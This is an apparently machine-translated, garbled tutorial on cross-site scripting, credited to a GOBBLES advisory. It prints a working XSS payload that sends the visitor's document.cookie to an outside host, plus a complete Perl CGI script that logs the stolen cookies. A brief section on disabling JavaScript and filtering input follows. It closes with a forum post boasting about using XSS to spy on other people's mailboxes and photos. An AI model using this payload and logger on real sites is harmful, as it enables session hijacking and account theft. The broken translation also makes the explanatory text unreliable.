----Copied from GOBBLES SECURITY ADVISORY #33----
</snip>

And true gain cookie makes the record the example:

Attention: Must make it to work, your browser must allow to accept http://website.tld stand transmission cookies,
When I test the following information, use
javascript founds visitor's cookies, javascript script to place in the index.html document.
OK, below supposition http://website.tld has the XSS attack the safe hidden danger, the existence crack's connection is:
http://website.tld/program.cgi?input= <evil javascript>
We found this kind of connection:
http://website.tld/program.cgi?input= <script>document.location='http://yoursite
.tld
/cgi-bin/evil_cookie_logger.cgi? '+document.cookie</script>
Then lets guarantee debit and credit stand cookie the user to visit this connection:

This is our CGI script, its function is makes the record to user cookie:

---------evil_cookie_logger.cgi-----------

#! /usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
#       cross-site scripting vulnerabilities.

$borrowed_info = $ENV {'QUERY_STRING'};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9]) /pack (“C”, hex($1)) /eg;

open (EVIL_COOKIE_LOG, “>>evil_cookie_log”) or print “Content-type:
text/html \ n \ n something went wrong \ n ";
  print EVIL_COOKIE_LOG “$borrowed_info \ n”;
  print “Content-type: text/html \ n \ n”;
close(EVIL_COOKIE_LOG);

------------------------------------------

This script first {'QUERY_STRING'} obtains cookie through $ENV, prints in the $borrowed_info variable,
Through open (EVIL_COOKIE_LOG, “>>evil_cookie_log”), preserves the cookie information evil_cookie_lo
g document.

Attention: The above javascript script, possibly cannot carry out in some browsers or the stand,
This is merely I makes the test in own stand to use.

How to guard against the XSS attack?
1. is forbid the javascript script on yours WEB browser
2. The exploiter must verify the code carefully, to submits the data-to carry on the effective inspection, like " < " and " > ".
   
May " < ", “> " transform into <, >
Attention: As a result of the XSS crack may by the use multiplicity, programmer probably understand needs to filter specifically character,
This mainly relies on develops the procedure the function, suggested that filters all Yuan characters, including " = ".

Do not visit to the victim contains the <script> character the connection, some official URL will not include any script element.

--
* origin: http://sinbad.zhoubin.com
In the past few days looked the sword heart studies css with the dog dog (Cross Site Scripting) the cross station, but can also deceive the mailbox, is jealous of ing…Also cannot lag behind comes to want the achievement shamelessly with others, own studies was looking, ha-ha. Studies in the process to discover oneself before to the css cross station concept grave mistake, the css harm is really not small, hangs the horse, steals cookies to take jurisdiction and so on, kills a person and takes his possessions, necessary good medicines! luoluo thought unexpectedly promotes using net Yi Schoolmate record xss him others Leader Ban, peeps the mm photograph, this brute fellow. That day listened to the dog dog saying that must write a short note notice the function, session has the effectiveness, could not to peep a mm mailbox to monitor all the time, this week-long traveling has hefted to record this matter, this morning came back to complete the short note notice function, ha-ha, happy ing…